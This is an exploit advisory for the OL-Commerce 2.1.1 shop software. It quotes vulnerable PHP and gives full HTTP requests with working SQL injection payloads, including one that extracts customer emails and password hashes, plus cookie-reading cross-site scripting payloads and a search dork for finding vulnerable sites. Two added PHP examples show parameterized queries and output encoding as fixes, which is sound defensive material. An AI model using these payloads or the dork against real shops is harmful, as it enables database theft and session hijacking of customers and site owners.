OL-Commerce 2.1.1 Cross Site Scripting / SQL Injection

Posted Jul 17, 2014
Authored by AtT4CKxT3rR0r1ST

OL-Commerce version 2.1.1 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 4f82c8a5cedb0631e0830ff7889b78362f484948bf62f7ba8d9b619b16d05643

OL-Commerce v2.1.1 - Multiple Vulnerabilities
===================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/ol-commerce/?source=directory
.:. Dork : inurl:"affiliate_signup.php" intext:"Mr:"
####################################################################

[1] Multiple SQL Injection
===========================
VULNERABILITY
##############
[I] /affiliate_signup.php

Line 53:
$a_company = olc_db_prepare_input($_POST['a_company']);

Line 169-175:
$check_query = olc_db_query("select count(*) as total from " . TABLE_ZONES . " where zone_country_id = '" . olc_db_input($a_country) . "'");
$check_value = olc_db_fetch_array($check_query);
$entry_state_has_zones = ($check_value['total'] > 0);
if ($entry_state_has_zones) {
    $zone_query = olc_db_query("select zone_id from " . TABLE_ZONES . " where zone_country_id = '" . olc_db_input($a_country) . "' and zone_name = '" . olc_db_input($a_state) . "'");
    if (olc_db_num_rows($zone_query) == 1) {
        $zone_values = olc_db_fetch_array($zone_query);

#########
EXPLOIT
#########
Type: POST String MySQL Injection

http://localhost/OL-Commerce/affiliate_signup.php

POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629

action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&a_email_address=email@hotmail.com&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&a_payment_paypal=email@hotmail.com
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[SQL INJECTION]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111&
a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3


[NOTE]
------
a_country=118[SQL INJECTION]=118' and 1=2 union all select group_concat(customers_id,0x3a,customers_email_address,0x3a,customers_password)+from+customers-- -

VULNERABILITY
##############
[II] /affiliate_show_banner.php (line 107-120)

if (isset($_GET['ref'])) $affiliate_id = $_GET['ref'];
if (isset($_POST['ref'])) $affiliate_id = $_POST['ref'];

if (isset($_GET['affiliate_banner_id'])) $banner_id = $_GET['affiliate_banner_id'];
if (isset($_POST['affiliate_banner_id'])) $banner_id = $_POST['affiliate_banner_id'];
if (isset($_GET['affiliate_pbanner_id'])) $prod_banner_id = $_GET['affiliate_pbanner_id'];
if (isset($_POST['affiliate_pbanner_id'])) $prod_banner_id = $_POST['affiliate_pbanner_id'];

if (!empty($banner_id)) {
    $is_banner = 'true';
    $sql = "select affiliate_banners_image, affiliate_products_id from " . TABLE_AFFILIATE_BANNERS . " where affiliate_banners_id = " . $banner_id . " and affiliate_status = 1";
    $banner_values = olc_db_query($sql);

#########
EXPLOIT
#########
Type: Double Query


http://localhost/OL-Commerce/affiliate_show_banner.php?ref=1&affiliate_banner_id=1[SQL INJECTION]

VULNERABILITY
##############
[III] /create_account.php

Line 75:

$country = olc_db_prepare_input($_POST['country']);

Line 218-219:

$check_query = olc_db_query("select count(*) as total from " . TABLE_ZONES . " where zone_country_id = '" . (int)$country . "'");
$check = olc_db_fetch_array($check_query);


#########
EXPLOIT
#########
Type: POST String Double Query


http://localhost/OL-Commerce/create_account.php

POST /OL-Commerce/create_account.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/create_account.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301


action=process&gender=m&firstname=aaaaa&lastname=bbbb
&dob=17.05.1991&email_address=email@hotmail.com
&company=ccc&vat=1234&street_address=dddd&suburb=eeee
&postcode=00961&city=fffff&state=gggggg
&country=118[SQL INJECTION]&telephone=45345325&fax=234234&password=12121212&confirmation=12121212&x=28&y=4

[NOTE]
------
country=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -

VULNERABILITY
##############
[V] /admin/create_account.php

Line 57:

$entry_country_id = olc_db_prepare_input($_POST['entry_country_id']);

Line 208-209:

$check_query = olc_db_query("select count(*) as total from " . TABLE_ZONES . " where zone_country_id = '" . olc_db_input($entry_country_id) . "'");
$check_value = olc_db_fetch_array($check_query);


#########
EXPLOIT
#########
Type: POST String Double Query

http://localhost/OL-Commerce/admin/create_account.php?action=edit

POST /OL-Commerce/admin/create_account.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&customers_email_address=email@hotmail.com
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[SQL INJECTION]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=

[NOTE]
------
entry_country_id=118[SQL INJECTION]=118' and (select 1 from (select
count(*),concat((select(select
concat(cast(concat(database(),0x3a,version()) as char),0x7e)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a) and 1=1-- -
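Every sink in section [1] is the same pattern: a numeric id (zone_country_id, affiliate_banners_id) or a zone name concatenated into the SQL string. The example below is added here and is not OL-Commerce code; it shows the zone lookup quoted from affiliate_signup.php and admin/create_account.php, plus the banner lookup from affiliate_show_banner.php, rewritten so the values are validated and bound as parameters. It assumes a mysqli connection in $db with mysqlnd (for get_result()); TABLE_ZONES and TABLE_AFFILIATE_BANNERS are the project's own constants seen in the excerpts, and the function names are hypothetical.

```php
<?php
// Added example, not OL-Commerce code. Assumes $db is a mysqli connection
// (mysqlnd, so get_result() is available) and that TABLE_ZONES and
// TABLE_AFFILIATE_BANNERS are the project's table-name constants.

function positive_int_or_null($value): ?int
{
    // zone_country_id and affiliate_banners_id are numeric foreign keys, so
    // anything that is not a plain positive integer is rejected outright.
    $n = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? null : $n;
}

// Hardened form of the affiliate_signup.php lines 169-175 flow:
// count the zones for the country, then require the state to match one zone.
function entry_state_is_valid(mysqli $db, $country, $state): bool
{
    $country_id = positive_int_or_null($country);
    if ($country_id === null) {
        return false;
    }

    $stmt = $db->prepare('SELECT COUNT(*) AS total FROM ' . TABLE_ZONES . ' WHERE zone_country_id = ?');
    $stmt->bind_param('i', $country_id);
    $stmt->execute();
    $total = (int)$stmt->get_result()->fetch_assoc()['total'];
    $stmt->close();
    if ($total === 0) {
        return true; // no zones defined for this country: nothing to match against
    }

    // The state name is free text; bind it as a string instead of quoting it.
    $state = is_string($state) ? $state : '';
    $stmt = $db->prepare('SELECT zone_id FROM ' . TABLE_ZONES . ' WHERE zone_country_id = ? AND zone_name = ?');
    $stmt->bind_param('is', $country_id, $state);
    $stmt->execute();
    $matches = $stmt->get_result()->num_rows;
    $stmt->close();
    return $matches === 1;
}

// Same treatment for the unquoted banner id in affiliate_show_banner.php.
function load_banner(mysqli $db, $banner_id): ?array
{
    $id = positive_int_or_null($banner_id);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT affiliate_banners_image, affiliate_products_id FROM ' . TABLE_AFFILIATE_BANNERS . ' WHERE affiliate_banners_id = ? AND affiliate_status = 1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

The (int) cast that the create_account.php excerpt already applies to $country is the minimal form of the same fix for an integer column; binding the value as a parameter additionally covers the string column (zone_name) that the cast cannot protect.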


[2] Multiple Post Cross Site Scripting
=======================================

[I] http://localhost/OL-Commerce/affiliate_signup.php

POST /OL-Commerce/affiliate_signup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/o/affiliate_signup.php
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 629

action=process&a_gender=m&a_firstname=haha&a_lastname=hahasdf&a_dob=457689
&a_email_address=email@hotmail.com&a_company=iiiiii&a_company_taxid=12
&a_payment_check=jjjjjj&a_payment_paypal=email@hotmail.com
&a_payment_bank_name=paypal
&a_payment_bank_branch_number=555555&a_payment_bank_swift_code=444444
&a_payment_bank_account_name=qqqqqq&a_payment_bank_account_number=3333333
&a_street_address=ddddddd&a_suburb=ccccccf&a_postcode=00961&a_city=bbbbbb
&a_country=118[XSS]&a_state=aaaaaa&a_telephone=22222222&a_fax=11111111&
a_homepage=http://iphobos.com/blog&a_password=12121212
&a_confirmation=12121212&a_agb=1&x=65&y=3


[NOTE]
------
a_country=118[XSS]=118'%22()%26%25<ScRiPt%20>prompt(document.cookie)</ScRiPt>


[II] http://localhost/OL-Commerce/admin/create_account.php?action=edit

POST /OL-Commerce/admin/create_account.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/OL-Commerce/admin/create_account.php?action=edit
Cookie:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

default_address_id=&customers_gender=m&csID=100&customers_firstname=aaaa
&customers_lastname=bbbb&customers_email_address=email@hotmail.com
&entry_company=cccc&customers_vat_id=1212&entry_street_address=dddd
&entry_postcode=00961&entry_city=eeee&entry_country_id=118[XSS]
&customers_telephone=12121233&customers_fax=23421424&status=0
&customers_mail=yes&payment_unallowed=&shipping_unallowed=
&entry_password=12121212&mail_comments=

[NOTE]
------
entry_country_id=118[XSS]=118'%22()%26%25<ScRiPt%20>prompt(document.cookie)</ScRiPt>
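Both entries in section [2] reflect a submitted country value back into the form without encoding it. The example below is added here and is not OL-Commerce code; it shows the two defensive steps that close this: treat the country field as the integer id it is meant to be, and HTML-encode any free-text field before it is echoed back. It assumes the form is re-rendered from the POST data on validation failure; the function names and the $countries array are hypothetical.

```php
<?php
// Added example, not OL-Commerce code. Assumes the signup/admin form is
// re-rendered from $_POST on validation failure; names are hypothetical.

function h($value): string
{
    // Encode for HTML body and attribute contexts. ENT_QUOTES covers both
    // quote styles, ENT_SUBSTITUTE keeps invalid UTF-8 from truncating output.
    return htmlspecialchars((string)$value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401, 'UTF-8');
}

// a_country / entry_country_id come from a select list of numeric ids:
// validate as an integer and never echo the raw submitted text.
function country_select(string $name, array $countries, $submitted): string
{
    $selected = filter_var($submitted, FILTER_VALIDATE_INT);
    $html = '<select name="' . h($name) . '">';
    foreach ($countries as $id => $label) {
        $attr = ($selected !== false && $selected === (int)$id) ? ' selected' : '';
        $html .= '<option value="' . h($id) . '"' . $attr . '>' . h($label) . '</option>';
    }
    return $html . '</select>';
}

// Free-text fields (a_state, a_city, ...) are echoed back encoded.
function text_field(string $name, $submitted): string
{
    return '<input type="text" name="' . h($name) . '" value="' . h($submitted) . '">';
}

// Fed the decoded payload from section [2],
//   118'"()&%<ScRiPt >prompt(document.cookie)</ScRiPt>
// text_field() produces
//   value="118&#039;&quot;()&amp;%&lt;ScRiPt &gt;prompt(document.cookie)&lt;/ScRiPt&gt;"
// which the browser shows as literal text; country_select() ignores it entirely
// because it is not an integer.
```

Validating the country id as an integer also removes the section [1] injection sink for the same parameter, so the two findings share a single input-side fix; the output encoding remains necessary for the fields that legitimately accept text.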

####################################################################